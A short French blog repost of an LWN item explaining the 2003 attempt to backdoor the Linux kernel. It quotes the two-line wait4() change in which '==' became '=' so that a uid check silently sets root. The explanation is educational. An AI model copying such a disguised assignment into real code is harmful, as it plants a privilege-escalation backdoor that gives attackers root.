sebsauvage.net

Ce site n'est pas le site officiel.
C'est un blog automatisé qui réplique les articles automatiquement

An attempt to backdoor the kernel [LWN.net]

Wednesday 25 September 2013 at 17:16

Ça ressemble à quoi une backdoor dans un Kernel linux ?
C'est aussi simple que remplacer "==" par "=" comme cela a été fait dans ces deux lignes de code:
      if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
                      retval = -EINVAL;

Ce qui ressemblait à l'origine à un contrôle de droits ("L'utilisateur est-il bien root ?") devient "On DONNE les droits root".
Donc n'importe qui qui aurait appelé cette fonction système wait4() avec ces deux flags actifs aurait obtenu l'accès root.

Un seul caractère supprimé, et voilà une backdoor pour obtenir l'accès root sur un système.  Devil is in the details.
(Permalink)

Source: http://lwn.net/Articles/57135/